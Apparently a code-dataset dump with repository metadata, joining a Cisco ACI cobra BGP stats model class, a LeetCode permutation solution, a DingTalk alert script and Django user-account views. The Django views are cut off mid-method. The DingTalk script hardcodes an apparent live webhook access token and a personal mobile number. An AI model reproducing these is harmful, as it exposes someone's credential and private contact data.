from cobra.mit.meta import NamedSourceRelationMeta
from cobra.mit.meta import TargetRelationMeta
from cobra.mit.meta import DeploymentPathMeta, DeploymentCategory
from cobra.model.category import MoCategory, PropCategory, CounterCategory
from cobra.mit.mo import Mo
# ##################################################
class BgpRtPrefixCountHist1year(Mo):
"""
Mo doc not defined in techpub!!!
"""
meta = StatsClassMeta("cobra.model.bgp.BgpRtPrefixCountHist1year", "BGP Route Prefix Count")
counter = CounterMeta("pfxSaved", CounterCategory.COUNTER, "routecount", "Prefixes Saved")
counter._propRefs[PropCategory.IMPLICIT_CUMULATIVE] = "pfxSavedCum"
counter._propRefs[PropCategory.IMPLICIT_PERIODIC] = "pfxSavedPer"
counter._propRefs[PropCategory.IMPLICIT_MIN] = "pfxSavedMin"
counter._propRefs[PropCategory.IMPLICIT_MAX] = "pfxSavedMax"
counter._propRefs[PropCategory.IMPLICIT_AVG] = "pfxSavedAvg"
counter._propRefs[PropCategory.IMPLICIT_SUSPECT] = "pfxSavedSpct"
counter._propRefs[PropCategory.IMPLICIT_THRESHOLDED] = "pfxSavedThr"
counter._propRefs[PropCategory.IMPLICIT_TREND] = "pfxSavedTr"
counter._propRefs[PropCategory.IMPLICIT_RATE] = "pfxSavedRate"
meta._counters.append(counter)
counter = CounterMeta("pfxSent", CounterCategory.COUNTER, "routecount", "Prefixes Sent")
counter._propRefs[PropCategory.IMPLICIT_CUMULATIVE] = "pfxSentCum"
counter._propRefs[PropCategory.IMPLICIT_PERIODIC] = "pfxSentPer"
counter._propRefs[PropCategory.IMPLICIT_MIN] = "pfxSentMin"
counter._propRefs[PropCategory.IMPLICIT_MAX] = "pfxSentMax"
counter._propRefs[PropCategory.IMPLICIT_AVG] = "pfxSentAvg"
counter._propRefs[PropCategory.IMPLICIT_SUSPECT] = "pfxSentSpct"
counter._propRefs[PropCategory.IMPLICIT_THRESHOLDED] = "pfxSentThr"
counter._propRefs[PropCategory.IMPLICIT_TREND] = "pfxSentTr"
counter._propRefs[PropCategory.IMPLICIT_RATE] = "pfxSentRate"
meta._counters.append(counter)
counter = CounterMeta("acceptedPaths", CounterCategory.COUNTER, "routecount", "Accepted Paths")
counter._propRefs[PropCategory.IMPLICIT_CUMULATIVE] = "acceptedPathsCum"
counter._propRefs[PropCategory.IMPLICIT_PERIODIC] = "acceptedPathsPer"
counter._propRefs[PropCategory.IMPLICIT_MIN] = "acceptedPathsMin"
counter._propRefs[PropCategory.IMPLICIT_MAX] = "acceptedPathsMax"
counter._propRefs[PropCategory.IMPLICIT_AVG] = "acceptedPathsAvg"
counter._propRefs[PropCategory.IMPLICIT_SUSPECT] = "acceptedPathsSpct"
counter._propRefs[PropCategory.IMPLICIT_THRESHOLDED] = "acceptedPathsThr"
counter._propRefs[PropCategory.IMPLICIT_TREND] = "acceptedPathsTr"
counter._propRefs[PropCategory.IMPLICIT_RATE] = "acceptedPathsRate"
meta._counters.append(counter)
meta.moClassName = "bgpBgpRtPrefixCountHist1year"
meta.rnFormat = "HDbgpBgpRtPrefixCount1year-%(index)s"
meta.category = MoCategory.STATS_HISTORY
meta.label = "historical BGP Route Prefix Count stats in 1 year"
meta.writeAccessMask = 0x8008020040001
meta.readAccessMask = 0x8008020040001
meta.isDomainable = False
meta.isReadOnly = True
meta.isConfigurable = False
meta.isDeletable = False
meta.isContextRoot = True
meta.parentClasses.add("cobra.model.bgp.PeerEntryStats")
meta.superClasses.add("cobra.model.bgp.BgpRtPrefixCountHist")
meta.superClasses.add("cobra.model.stats.Item")
meta.superClasses.add("cobra.model.stats.Hist")
meta.rnPrefixes = [
('HDbgpBgpRtPrefixCount1year-', True),
]
prop = PropMeta("str", "acceptedPathsAvg", "acceptedPathsAvg", 53822, PropCategory.IMPLICIT_AVG)
prop.label = "Accepted Paths average value"
prop.isOper = True
prop.isStats = True
meta.props.add("acceptedPathsAvg", prop)
prop = PropMeta("str", "acceptedPathsCum", "acceptedPathsCum", 53818, PropCategory.IMPLICIT_CUMULATIVE)
prop.label = "Accepted Paths cumulative"
prop.isOper = True
prop.isStats = True
meta.props.add("acceptedPathsCum", prop)
prop = PropMeta("str", "acceptedPathsMax", "acceptedPathsMax", 53821, PropCategory.IMPLICIT_MAX)
prop.label = "Accepted Paths maximum value"
prop.isOper = True
prop.isStats = True
meta.props.add("acceptedPathsMax", prop)
prop = PropMeta("str", "acceptedPathsMin", "acceptedPathsMin", 53820, PropCategory.IMPLICIT_MIN)
prop.label = "Accepted Paths minimum value"
prop.isOper = True
prop.isStats = True
meta.props.add("acceptedPathsMin", prop)
prop = PropMeta("str", "acceptedPathsPer", "acceptedPathsPer", 53819, PropCategory.IMPLICIT_PERIODIC)
prop.label = "Accepted Paths periodic"
prop.isOper = True
prop.isStats = True
meta.props.add("acceptedPathsPer", prop)
prop = PropMeta("str", "acceptedPathsRate", "acceptedPathsRate", 53826, PropCategory.IMPLICIT_RATE)
prop.label = "Accepted Paths rate"
prop.isOper = True
prop.isStats = True
meta.props.add("acceptedPathsRate", prop)
prop = PropMeta("str", "acceptedPathsSpct", "acceptedPathsSpct", 53823, PropCategory.IMPLICIT_SUSPECT)
prop.label = "Accepted Paths suspect count"
prop.isOper = True
prop.isStats = True
meta.props.add("acceptedPathsSpct", prop)
prop = PropMeta("str", "acceptedPathsThr", "acceptedPathsThr", 53824, PropCategory.IMPLICIT_THRESHOLDED)
prop.label = "Accepted Paths thresholded flags"
prop.isOper = True
prop.isStats = True
prop.defaultValue = 0
prop.defaultValueStr = "unspecified"
prop._addConstant("avgCrit", "avg-severity-critical", 2199023255552)
prop._addConstant("avgHigh", "avg-crossed-high-threshold", 68719476736)
prop._addConstant("avgLow", "avg-crossed-low-threshold", 137438953472)
prop._addConstant("avgMajor", "avg-severity-major", 1099511627776)
prop._addConstant("avgMinor", "avg-severity-minor", 549755813888)
prop._addConstant("avgRecovering", "avg-recovering", 34359738368)
prop._addConstant("avgWarn", "avg-severity-warning", 274877906944)
prop._addConstant("cumulativeCrit", "cumulative-severity-critical", 8192)
prop._addConstant("cumulativeHigh", "cumulative-crossed-high-threshold", 256)
prop._addConstant("cumulativeLow", "cumulative-crossed-low-threshold", 512)
prop._addConstant("cumulativeMajor", "cumulative-severity-major", 4096)
prop._addConstant("cumulativeMinor", "cumulative-severity-minor", 2048)
prop._addConstant("cumulativeRecovering", "cumulative-recovering", 128)
prop._addConstant("cumulativeWarn", "cumulative-severity-warning", 1024)
prop._addConstant("lastReadingCrit", "lastreading-severity-critical", 64)
prop._addConstant("lastReadingHigh", "lastreading-crossed-high-threshold", 2)
prop._addConstant("lastReadingLow", "lastreading-crossed-low-threshold", 4)
prop._addConstant("lastReadingMajor", "lastreading-severity-major", 32)
prop._addConstant("lastReadingMinor", "lastreading-severity-minor", 16)
prop._addConstant("lastReadingRecovering", "lastreading-recovering", 1)
prop._addConstant("lastReadingWarn", "lastreading-severity-warning", 8)
prop._addConstant("maxCrit", "max-severity-critical", 17179869184)
prop._addConstant("maxHigh", "max-crossed-high-threshold", 536870912)
prop._addConstant("maxLow", "max-crossed-low-threshold", 1073741824)
prop._addConstant("maxMajor", "max-severity-major", 8589934592)
prop._addConstant("maxMinor", "max-severity-minor", 4294967296)
prop._addConstant("maxRecovering", "max-recovering", 268435456)
prop._addConstant("maxWarn", "max-severity-warning", 2147483648)
prop._addConstant("minCrit", "min-severity-critical", 134217728)
prop._addConstant("minHigh", "min-crossed-high-threshold", 4194304)
prop._addConstant("minLow", "min-crossed-low-threshold", 8388608)
prop._addConstant("minMajor", "min-severity-major", 67108864)
prop._addConstant("minMinor", "min-severity-minor", 33554432)
prop._addConstant("minRecovering", "min-recovering", 2097152)
prop._addConstant("minWarn", "min-severity-warning", 16777216)
prop._addConstant("periodicCrit", "periodic-severity-critical", 1048576)
prop._addConstant("periodicHigh", "periodic-crossed-high-threshold", 32768)
prop._addConstant("periodicLow", "periodic-crossed-low-threshold", 65536)
prop._addConstant("periodicMajor", "periodic-severity-major", 524288)
prop._addConstant("periodicMinor", "periodic-severity-minor", 262144)
prop._addConstant("periodicRecovering", "periodic-recovering", 16384)
prop._addConstant("periodicWarn", "periodic-severity-warning", 131072)
prop._addConstant("rateCrit", "rate-severity-critical", 36028797018963968)
prop._addConstant("rateHigh", "rate-crossed-high-threshold", 1125899906842624)
prop._addConstant("rateLow", "rate-crossed-low-threshold", 2251799813685248)
prop._addConstant("rateMajor", "rate-severity-major", 18014398509481984)
prop._addConstant("rateMinor", "rate-severity-minor", 9007199254740992)
prop._addConstant("rateRecovering", "rate-recovering", 562949953421312)
prop._addConstant("rateWarn", "rate-severity-warning", 4503599627370496)
prop._addConstant("trendCrit", "trend-severity-critical", 281474976710656)
prop._addConstant("trendHigh", "trend-crossed-high-threshold", 8796093022208)
prop._addConstant("trendLow", "trend-crossed-low-threshold", 17592186044416)
prop._addConstant("trendMajor", "trend-severity-major", 140737488355328)
prop._addConstant("trendMinor", "trend-severity-minor", 70368744177664)
prop._addConstant("trendRecovering", "trend-recovering", 4398046511104)
prop._addConstant("trendWarn", "trend-severity-warning", 35184372088832)
prop._addConstant("unspecified", None, 0)
meta.props.add("acceptedPathsThr", prop)
prop = PropMeta("str", "acceptedPathsTr", "acceptedPathsTr", 53825, PropCategory.IMPLICIT_TREND)
prop.label = "Accepted Paths trend"
prop.isOper = True
prop.isStats = True
meta.props.add("acceptedPathsTr", prop)
prop = PropMeta("str", "childAction", "childAction", 4, PropCategory.CHILD_ACTION)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("deleteAll", "deleteall", 16384)
prop._addConstant("deleteNonPresent", "deletenonpresent", 8192)
prop._addConstant("ignore", "ignore", 4096)
meta.props.add("childAction", prop)
prop = PropMeta("str", "cnt", "cnt", 16212, PropCategory.REGULAR)
prop.label = "Number of Collections During this Interval"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("cnt", prop)
prop = PropMeta("str", "dn", "dn", 1, PropCategory.DN)
prop.label = "None"
prop.isDn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("dn", prop)
prop = PropMeta("str", "index", "index", 53426, PropCategory.REGULAR)
prop.label = "History Index"
prop.isConfig = True
prop.isAdmin = True
prop.isCreateOnly = True
prop.isNaming = True
meta.props.add("index", prop)
prop = PropMeta("str", "lastCollOffset", "lastCollOffset", 111, PropCategory.REGULAR)
prop.label = "Collection Length"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("lastCollOffset", prop)
prop = PropMeta("str", "modTs", "modTs", 7, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "never"
prop._addConstant("never", "never", 0)
meta.props.add("modTs", prop)
prop = PropMeta("str", "pfxSavedAvg", "pfxSavedAvg", 53843, PropCategory.IMPLICIT_AVG)
prop.label = "Prefixes Saved average value"
prop.isOper = True
prop.isStats = True
meta.props.add("pfxSavedAvg", prop)
prop = PropMeta("str", "pfxSavedCum", "pfxSavedCum", 53839, PropCategory.IMPLICIT_CUMULATIVE)
prop.label = "Prefixes Saved cumulative"
prop.isOper = True
prop.isStats = True
meta.props.add("pfxSavedCum", prop)
prop = PropMeta("str", "pfxSavedMax", "pfxSavedMax", 53842, PropCategory.IMPLICIT_MAX)
prop.label = "Prefixes Saved maximum value"
prop.isOper = True
prop.isStats = True
meta.props.add("pfxSavedMax", prop)
prop = PropMeta("str", "pfxSavedMin", "pfxSavedMin", 53841, PropCategory.IMPLICIT_MIN)
prop.label = "Prefixes Saved minimum value"
prop.isOper = True
prop.isStats = True
meta.props.add("pfxSavedMin", prop)
prop = PropMeta("str", "pfxSavedPer", "pfxSavedPer", 53840, PropCategory.IMPLICIT_PERIODIC)
prop.label = "Prefixes Saved periodic"
prop.isOper = True
prop.isStats = True
meta.props.add("pfxSavedPer", prop)
prop = PropMeta("str", "pfxSavedRate", "pfxSavedRate", 53847, PropCategory.IMPLICIT_RATE)
prop.label = "Prefixes Saved rate"
prop.isOper = True
prop.isStats = True
meta.props.add("pfxSavedRate", prop)
prop = PropMeta("str", "pfxSavedSpct", "pfxSavedSpct", 53844, PropCategory.IMPLICIT_SUSPECT)
prop.label = "Prefixes Saved suspect count"
prop.isOper = True
prop.isStats = True
meta.props.add("pfxSavedSpct", prop)
prop = PropMeta("str", "pfxSavedThr", "pfxSavedThr", 53845, PropCategory.IMPLICIT_THRESHOLDED)
prop.label = "Prefixes Saved thresholded flags"
prop.isOper = True
prop.isStats = True
prop.defaultValue = 0
prop.defaultValueStr = "unspecified"
prop._addConstant("avgCrit", "avg-severity-critical", 2199023255552)
prop._addConstant("avgHigh", "avg-crossed-high-threshold", 68719476736)
prop._addConstant("avgLow", "avg-crossed-low-threshold", 137438953472)
prop._addConstant("avgMajor", "avg-severity-major", 1099511627776)
prop._addConstant("avgMinor", "avg-severity-minor", 549755813888)
prop._addConstant("avgRecovering", "avg-recovering", 34359738368)
prop._addConstant("avgWarn", "avg-severity-warning", 274877906944)
prop._addConstant("cumulativeCrit", "cumulative-severity-critical", 8192)
prop._addConstant("cumulativeHigh", "cumulative-crossed-high-threshold", 256)
prop._addConstant("cumulativeLow", "cumulative-crossed-low-threshold", 512)
prop._addConstant("cumulativeMajor", "cumulative-severity-major", 4096)
prop._addConstant("cumulativeMinor", "cumulative-severity-minor", 2048)
prop._addConstant("cumulativeRecovering", "cumulative-recovering", 128)
prop._addConstant("cumulativeWarn", "cumulative-severity-warning", 1024)
prop._addConstant("lastReadingCrit", "lastreading-severity-critical", 64)
prop._addConstant("lastReadingHigh", "lastreading-crossed-high-threshold", 2)
prop._addConstant("lastReadingLow", "lastreading-crossed-low-threshold", 4)
prop._addConstant("lastReadingMajor", "lastreading-severity-major", 32)
prop._addConstant("lastReadingMinor", "lastreading-severity-minor", 16)
prop._addConstant("lastReadingRecovering", "lastreading-recovering", 1)
prop._addConstant("lastReadingWarn", "lastreading-severity-warning", 8)
prop._addConstant("maxCrit", "max-severity-critical", 17179869184)
prop._addConstant("maxHigh", "max-crossed-high-threshold", 536870912)
prop._addConstant("maxLow", "max-crossed-low-threshold", 1073741824)
prop._addConstant("maxMajor", "max-severity-major", 8589934592)
prop._addConstant("maxMinor", "max-severity-minor", 4294967296)
prop._addConstant("maxRecovering", "max-recovering", 268435456)
prop._addConstant("maxWarn", "max-severity-warning", 2147483648)
prop._addConstant("minCrit", "min-severity-critical", 134217728)
prop._addConstant("minHigh", "min-crossed-high-threshold", 4194304)
prop._addConstant("minLow", "min-crossed-low-threshold", 8388608)
prop._addConstant("minMajor", "min-severity-major", 67108864)
prop._addConstant("minMinor", "min-severity-minor", 33554432)
prop._addConstant("minRecovering", "min-recovering", 2097152)
prop._addConstant("minWarn", "min-severity-warning", 16777216)
prop._addConstant("periodicCrit", "periodic-severity-critical", 1048576)
prop._addConstant("periodicHigh", "periodic-crossed-high-threshold", 32768)
prop._addConstant("periodicLow", "periodic-crossed-low-threshold", 65536)
prop._addConstant("periodicMajor", "periodic-severity-major", 524288)
prop._addConstant("periodicMinor", "periodic-severity-minor", 262144)
prop._addConstant("periodicRecovering", "periodic-recovering", 16384)
prop._addConstant("periodicWarn", "periodic-severity-warning", 131072)
prop._addConstant("rateCrit", "rate-severity-critical", 36028797018963968)
prop._addConstant("rateHigh", "rate-crossed-high-threshold", 1125899906842624)
prop._addConstant("rateLow", "rate-crossed-low-threshold", 2251799813685248)
prop._addConstant("rateMajor", "rate-severity-major", 18014398509481984)
prop._addConstant("rateMinor", "rate-severity-minor", 9007199254740992)
prop._addConstant("rateRecovering", "rate-recovering", 562949953421312)
prop._addConstant("rateWarn", "rate-severity-warning", 4503599627370496)
prop._addConstant("trendCrit", "trend-severity-critical", 281474976710656)
prop._addConstant("trendHigh", "trend-crossed-high-threshold", 8796093022208)
prop._addConstant("trendLow", "trend-crossed-low-threshold", 17592186044416)
prop._addConstant("trendMajor", "trend-severity-major", 140737488355328)
prop._addConstant("trendMinor", "trend-severity-minor", 70368744177664)
prop._addConstant("trendRecovering", "trend-recovering", 4398046511104)
prop._addConstant("trendWarn", "trend-severity-warning", 35184372088832)
prop._addConstant("unspecified", None, 0)
meta.props.add("pfxSavedThr", prop)
prop = PropMeta("str", "pfxSavedTr", "pfxSavedTr", 53846, PropCategory.IMPLICIT_TREND)
prop.label = "Prefixes Saved trend"
prop.isOper = True
prop.isStats = True
meta.props.add("pfxSavedTr", prop)
prop = PropMeta("str", "pfxSentAvg", "pfxSentAvg", 53864, PropCategory.IMPLICIT_AVG)
prop.label = "Prefixes Sent average value"
prop.isOper = True
prop.isStats = True
meta.props.add("pfxSentAvg", prop)
prop = PropMeta("str", "pfxSentCum", "pfxSentCum", 53860, PropCategory.IMPLICIT_CUMULATIVE)
prop.label = "Prefixes Sent cumulative"
prop.isOper = True
prop.isStats = True
meta.props.add("pfxSentCum", prop)
prop = PropMeta("str", "pfxSentMax", "pfxSentMax", 53863, PropCategory.IMPLICIT_MAX)
prop.label = "Prefixes Sent maximum value"
prop.isOper = True
prop.isStats = True
meta.props.add("pfxSentMax", prop)
prop = PropMeta("str", "pfxSentMin", "pfxSentMin", 53862, PropCategory.IMPLICIT_MIN)
prop.label = "Prefixes Sent minimum value"
prop.isOper = True
prop.isStats = True
meta.props.add("pfxSentMin", prop)
prop = PropMeta("str", "pfxSentPer", "pfxSentPer", 53861, PropCategory.IMPLICIT_PERIODIC)
prop.label = "Prefixes Sent periodic"
prop.isOper = True
prop.isStats = True
meta.props.add("pfxSentPer", prop)
prop = PropMeta("str", "pfxSentRate", "pfxSentRate", 53868, PropCategory.IMPLICIT_RATE)
prop.label = "Prefixes Sent rate"
prop.isOper = True
prop.isStats = True
meta.props.add("pfxSentRate", prop)
prop = PropMeta("str", "pfxSentSpct", "pfxSentSpct", 53865, PropCategory.IMPLICIT_SUSPECT)
prop.label = "Prefixes Sent suspect count"
prop.isOper = True
prop.isStats = True
meta.props.add("pfxSentSpct", prop)
prop = PropMeta("str", "pfxSentThr", "pfxSentThr", 53866, PropCategory.IMPLICIT_THRESHOLDED)
prop.label = "Prefixes Sent thresholded flags"
prop.isOper = True
prop.isStats = True
prop.defaultValue = 0
prop.defaultValueStr = "unspecified"
prop._addConstant("avgCrit", "avg-severity-critical", 2199023255552)
prop._addConstant("avgHigh", "avg-crossed-high-threshold", 68719476736)
prop._addConstant("avgLow", "avg-crossed-low-threshold", 137438953472)
prop._addConstant("avgMajor", "avg-severity-major", 1099511627776)
prop._addConstant("avgMinor", "avg-severity-minor", 549755813888)
prop._addConstant("avgRecovering", "avg-recovering", 34359738368)
prop._addConstant("avgWarn", "avg-severity-warning", 274877906944)
prop._addConstant("cumulativeCrit", "cumulative-severity-critical", 8192)
prop._addConstant("cumulativeHigh", "cumulative-crossed-high-threshold", 256)
prop._addConstant("cumulativeLow", "cumulative-crossed-low-threshold", 512)
prop._addConstant("cumulativeMajor", "cumulative-severity-major", 4096)
prop._addConstant("cumulativeMinor", "cumulative-severity-minor", 2048)
prop._addConstant("cumulativeRecovering", "cumulative-recovering", 128)
prop._addConstant("cumulativeWarn", "cumulative-severity-warning", 1024)
prop._addConstant("lastReadingCrit", "lastreading-severity-critical", 64)
prop._addConstant("lastReadingHigh", "lastreading-crossed-high-threshold", 2)
prop._addConstant("lastReadingLow", "lastreading-crossed-low-threshold", 4)
prop._addConstant("lastReadingMajor", "lastreading-severity-major", 32)
prop._addConstant("lastReadingMinor", "lastreading-severity-minor", 16)
prop._addConstant("lastReadingRecovering", "lastreading-recovering", 1)
prop._addConstant("lastReadingWarn", "lastreading-severity-warning", 8)
prop._addConstant("maxCrit", "max-severity-critical", 17179869184)
prop._addConstant("maxHigh", "max-crossed-high-threshold", 536870912)
prop._addConstant("maxLow", "max-crossed-low-threshold", 1073741824)
prop._addConstant("maxMajor", "max-severity-major", 8589934592)
prop._addConstant("maxMinor", "max-severity-minor", 4294967296)
prop._addConstant("maxRecovering", "max-recovering", 268435456)
prop._addConstant("maxWarn", "max-severity-warning", 2147483648)
prop._addConstant("minCrit", "min-severity-critical", 134217728)
prop._addConstant("minHigh", "min-crossed-high-threshold", 4194304)
prop._addConstant("minLow", "min-crossed-low-threshold", 8388608)
prop._addConstant("minMajor", "min-severity-major", 67108864)
prop._addConstant("minMinor", "min-severity-minor", 33554432)
prop._addConstant("minRecovering", "min-recovering", 2097152)
prop._addConstant("minWarn", "min-severity-warning", 16777216)
prop._addConstant("periodicCrit", "periodic-severity-critical", 1048576)
prop._addConstant("periodicHigh", "periodic-crossed-high-threshold", 32768)
prop._addConstant("periodicLow", "periodic-crossed-low-threshold", 65536)
prop._addConstant("periodicMajor", "periodic-severity-major", 524288)
prop._addConstant("periodicMinor", "periodic-severity-minor", 262144)
prop._addConstant("periodicRecovering", "periodic-recovering", 16384)
prop._addConstant("periodicWarn", "periodic-severity-warning", 131072)
prop._addConstant("rateCrit", "rate-severity-critical", 36028797018963968)
prop._addConstant("rateHigh", "rate-crossed-high-threshold", 1125899906842624)
prop._addConstant("rateLow", "rate-crossed-low-threshold", 2251799813685248)
prop._addConstant("rateMajor", "rate-severity-major", 18014398509481984)
prop._addConstant("rateMinor", "rate-severity-minor", 9007199254740992)
prop._addConstant("rateRecovering", "rate-recovering", 562949953421312)
prop._addConstant("rateWarn", "rate-severity-warning", 4503599627370496)
prop._addConstant("trendCrit", "trend-severity-critical", 281474976710656)
prop._addConstant("trendHigh", "trend-crossed-high-threshold", 8796093022208)
prop._addConstant("trendLow", "trend-crossed-low-threshold", 17592186044416)
prop._addConstant("trendMajor", "trend-severity-major", 140737488355328)
prop._addConstant("trendMinor", "trend-severity-minor", 70368744177664)
prop._addConstant("trendRecovering", "trend-recovering", 4398046511104)
prop._addConstant("trendWarn", "trend-severity-warning", 35184372088832)
prop._addConstant("unspecified", None, 0)
meta.props.add("pfxSentThr", prop)
prop = PropMeta("str", "pfxSentTr", "pfxSentTr", 53867, PropCategory.IMPLICIT_TREND)
prop.label = "Prefixes Sent trend"
prop.isOper = True
prop.isStats = True
meta.props.add("pfxSentTr", prop)
prop = PropMeta("str", "repIntvEnd", "repIntvEnd", 110, PropCategory.REGULAR)
prop.label = "Reporting End Time"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("repIntvEnd", prop)
prop = PropMeta("str", "repIntvStart", "repIntvStart", 109, PropCategory.REGULAR)
prop.label = "Reporting Start Time"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("repIntvStart", prop)
prop = PropMeta("str", "rn", "rn", 2, PropCategory.RN)
prop.label = "None"
prop.isRn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("rn", prop)
prop = PropMeta("str", "status", "status", 3, PropCategory.STATUS)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("created", "created", 2)
prop._addConstant("deleted", "deleted", 8)
prop._addConstant("modified", "modified", 4)
meta.props.add("status", prop)
meta.namingProps.append(getattr(meta.props, "index"))
def __init__(self, parentMoOrDn, index, markDirty=True, **creationProps):
namingVals = [index]
Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)
# End of package file
# ##################################################
| [
"[email protected]"
] | |
f46600e041a9e3fa1eb90c0961f25917ad284329 | e95fc8c562c050f47ecb6fb2639ce3024271a06d | /medium/46.全排列.py | 60bd223afd3aaf74a76e0693f8cd590cbe521c1d | [] | no_license | w940853815/my_leetcode | 3fb56745b95fbcb4086465ff42ea377c1d9fc764 | 6d39fa76c0def4f1d57840c40ffb360678caa96e | refs/heads/master | 2023-05-25T03:39:32.304242 | 2023-05-22T01:46:43 | 2023-05-22T01:46:43 | 179,017,338 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,032 | py | #
# @lc app=leetcode.cn id=46 lang=python3
#
# [46] 全排列
#
# @lc code=start
from typing import List
"""
result = []
def backtrack(路径, 选择列表):
if 满足结束条件:
result.add(路径)
return
for 选择 in 选择列表:
做选择
backtrack(路径, 选择列表)
撤销选择
"""
class Solution:
def permute(self, nums: List[int]) -> List[List[int]]:
res = []
track = []
def backtrack(track, nums):
if len(track) == len(nums):
# 列表深拷贝
tmp = list(track)
res.append(tmp)
return
for i in range(len(nums)):
if nums[i] in track:
continue
track.append(nums[i])
backtrack(track, nums)
track.pop()
backtrack(track, nums)
return res
if __name__ == "__main__":
s = Solution()
res = s.permute([1, 2, 3])
print(res)
# @lc code=end
| [
"[email protected]"
] | |
696b87b0bff7a5bcf494441ef9ff10dbad893cd4 | 8fd07ea363ba4263bafe25d213c72cc9a93e2b3e | /devops/Day4_json_requests_zabbix-api/zabbix/dingtalk.py | 2112181a91ce4aaf534cba9d5b2bc2035ec13296 | [] | no_license | ml758392/python_tedu | 82e12ae014f0fc81230386fab07f901510fc8837 | 9f20798604db0ac8cd7b69d8c7a52ee361ebc7a7 | refs/heads/master | 2020-04-12T08:30:42.354663 | 2019-03-29T11:55:30 | 2019-03-29T11:55:30 | 162,386,878 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 821 | py | # -*-coding:utf-8-*-
import json
import requests
import sys
def send_msg(url, reminders, msg):
headers = {'Content-Type': 'application/json;charset=utf-8'}
data = {
"msgtype": "text", # 发送消息类型为文本
"at": {
"atMobiles": reminders,
"isAtAll": False, # 不@所有人
},
"text": {
"content": msg, # 消息正文
}
}
r = requests.post(url, data=json.dumps(data), headers=headers)
return r.text
if __name__ == '__main__':
msg = sys.argv[1]
reminders = ['15937762237'] # 特别提醒要查看的人,就是@某人一下
url = 'https://oapi.dingtalk.com/robot/send?access_token=f62936c2eb31a053f422b5fdea9ea4748ce873a399ab521ccbf3ec\
29fefce9d1'
print(send_msg(url, reminders, msg))
| [
"yy.tedu.cn"
] | yy.tedu.cn |
616469de1aec009732d1ae11d1d7737bda848a16 | 75a2d464d10c144a6226cb5941c86423a1f769cf | /users/views.py | 21cc73b926aab722ac47e1f4965cdb0561c47aff | [] | no_license | Swiftkind/invoice | f5543cbe81b6d42e9938470265d7affb56ab83dd | 17615ea9bfb1edebe41d60dbf2e977f0018d5339 | refs/heads/master | 2021-09-07T18:16:01.647083 | 2018-02-08T08:13:18 | 2018-02-08T08:13:18 | 115,474,697 | 0 | 3 | null | 2018-02-27T06:58:42 | 2017-12-27T02:55:40 | Python | UTF-8 | Python | false | false | 5,494 | py | from django.contrib.auth import authenticate, login, logout
from django.contrib.auth.mixins import LoginRequiredMixin
from django.contrib import messages
from django.http import Http404
from django.shortcuts import get_object_or_404, render, redirect
from django.views.generic import TemplateView
from django.views import View
from users.forms import CompanyForm, UserChangePasswordForm, UserUpdateForm, SigninForm, SignupForm
from users.mixins import UserIsOwnerMixin
from users.models import Company, User
class SigninView(TemplateView):
"""Signin user
"""
template_name = 'users/signin.html'
def get(self, *args, **kwargs):
"""Get signin form
"""
if self.request.user.is_authenticated:
return redirect('index')
form = SigninForm()
return render(self.request, self.template_name,{'form':form})
def post(self, *args, **kwargs):
"""Signin user
"""
form = SigninForm(data=self.request.POST)
if form.is_valid():
login(self.request, form.user_cache)
return redirect('index')
else:
context={ 'form':form,}
return render(self.request, self.template_name, context)
class SignupView(TemplateView):
"""Signup user
"""
template_name = 'users/signup.html'
def get(self, *args, **kwargs):
"""Display signup form
"""
context = { 'company_form' : CompanyForm(),
'signup_form' : SignupForm(),
}
return render(self.request, self.template_name, context)
def post(self, *args, **kwargs):
company_form = CompanyForm(self.request.POST, self.request.FILES)
signup_form = SignupForm(self.request.POST, self.request.FILES)
if signup_form.is_valid() and company_form.is_valid():
company = company_form.save(commit=False)
user = signup_form.save(commit=False)
company.save()
user.company = company
user.save()
messages.error(self.request, 'Account successfully created. Activate your account from the admin.')
return redirect('index')
else:
context = { 'company_form' : CompanyForm(self.request.POST),
'signup_form' : SignupForm(self.request.POST),
}
return render(self.request, self.template_name, context)
class SignoutView(LoginRequiredMixin, View):
"""Signout a user
"""
def get(self, *args, **kwargs):
"""Logout user and redirect to signin
"""
logout(self.request)
return redirect('signin')
class UserProfileView(UserIsOwnerMixin, TemplateView):
"""User profile
"""
template_name = 'users/profile.html'
def get(self, *args, **kwargs):
"""View user details
"""
context = {'user': get_object_or_404(User, pk=kwargs['user_id'])}
return render(self.request, self.template_name, context=context)
class UserUpdateView(UserIsOwnerMixin, TemplateView):
"""Update User
"""
template_name = 'users/update_user.html'
def get(self, *args, **kwargs):
"""Display form
"""
user = get_object_or_404(User, pk=kwargs['user_id'])
if self.request.user == user:
context = { 'company_form':CompanyForm(instance=user.company),
'user_form': UserUpdateForm(instance=user),
}
return render(self.request, self.template_name, context=context)
else:
raise Http404("Does not exist")
def post(self, request, *args, **kwargs):
"""Update a user
"""
user = get_object_or_404(User, pk=kwargs['user_id'])
user_form = UserUpdateForm(self.request.POST, self.request.FILES,instance=user)
company_form = CompanyForm(self.request.POST, self.request.FILES,instance=user.company)
if user_form.is_valid() and company_form.is_valid():
company_form.save()
user_form.save()
messages.success(self.request, 'User is successfully updated')
return redirect('index' )
else:
context = { 'company_form': company_form,
'user_form' : user_form,
}
return render(self.request, self.template_name, context=context)
class UserSettingView(UserIsOwnerMixin, TemplateView):
""" User settings
"""
template_name = 'users/setting.html'
def get(self, *args, **kwargs):
""" View setting
"""
return render(self.request, self.template_name)
class UserChangePassword(UserIsOwnerMixin, TemplateView):
""" User change password
"""
template_name = 'users/change_password.html'
def get(self, *args, **kwargs):
""" Change password form
"""
context = {}
context['form'] = UserChangePasswordForm()
return render(self.request, self.template_name, context)
def post(self, *args, **kwargs):
""" Check old and new password match
"""
form = UserChangePasswordForm(self.request.POST, user=self.request.user)
if form.is_valid():
form.save()
return redirect('index')
else:
context = {}
context['form'] = UserChangePasswordForm(self.request.POST, user=self.request.user)
